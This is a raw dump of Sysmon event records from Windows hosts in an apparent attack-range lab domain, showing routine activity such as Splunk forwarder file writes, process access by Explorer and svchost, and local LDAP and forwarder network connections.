23542300x80000000000000001054438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:15.440{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D225F78390EA9D2D13ED48232CA54A5A,SHA256=F08F9C661659844E3F51D30BE22378FD5AC85BD7097F370154D3782C6CBAE925,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810250Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:15.193{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C298395BA7CDC785C3C5A3E068B2513,SHA256=F26A984CEF6E70061C3963C922E8F8DE5B213E11AC203D6D94200ECCE5844521,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:15.303{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:15.303{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001054443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:08.084{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61962-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001054442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:08.084{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61962-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001054441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:16.456{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A51B3497AE71743CB2B5308A12411ABC,SHA256=725389A485099FF248601D2922664F2F3E12C3382AD5D45A79D99AF5310D9441,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810251Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:16.240{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=424D3C86E468741CEB889F6189EEC737,SHA256=1F2B1ABFD032E947783558E60BD149C184639164FD960A4891AE25A303F5EB49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:17.486{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=725F316CED708DB6D3FF073F46503F03,SHA256=1460145BD99FF26F1763BDDBC4D37A9B202599F194B293F7410A3EB4D1931F66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810252Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:17.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A263EC12AC7F92A7E09D691C1F0BAC8,SHA256=EBD4DDD7D1F1319C4C3CF50B05C78F3935459912B091E8DEA372A60834E91A41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:18.516{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:18.500{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=414F95CFE1189F773183353876A0FDE4,SHA256=53EF9A6E5BF5396A265FE4C07A04EB57FDC911F5C35DC7F7E2E20B8C954DDFD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810253Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:18.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7818344D5B8D8EDBE368C733DC6777CB,SHA256=FDE6E46D511679A1146FA58247432BB5C30F61F2DA60AA6A53C53AC3B0EDA5D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.644{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61963-false10.0.1.12-8000- 23542300x80000000000000001054448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:19.501{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B0BC57D5FEDB541FA285ED3DBF6B923,SHA256=D05C72745299FB1B3547CD6267952F6C07577BA3FB3C2430C9204C0915525FE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810255Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:19.303{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED34FC2E7B55514A5243E7DFBCF07DA3,SHA256=20BCEF62DC8B4431EE467EDF69071E3E361ACACD79523B946E745B78323BC005,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810254Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:17.374{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57456-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:20.515{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D47E1AC2A1A920BC20C1CC683BC6A3E8,SHA256=5D1D5A5B8EC6CBDD865E82B6EC108884754F819E04AFECEDB02AE8489CC10DF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810257Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:20.850{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810256Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:20.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B82B44C673050AAB65BA9B206079208,SHA256=6E4AF4C1BAEE203B4626BA03C383666A56E41C07E46316021D28DCC155F48576,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:21.668{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:21.668{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:21.515{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34FF42A4754A45E10E94E82E636F394F,SHA256=6027F246E3F16492F9921F3E7B3930281BB22F2D54735049845B43E269CB32F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810258Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:21.350{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CADC76A9861EDC40AD370655681EB5,SHA256=F54DCA2D26559E07EA4845C9A6DA833A6A293C6BD56A7705B611915AE6057A49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.769{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F02298B5C54EB669ADC6015229F3FE69,SHA256=959CA83D59EC264C214E20C276AE8D09079176C3CFC7629A5991588247ED5539,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 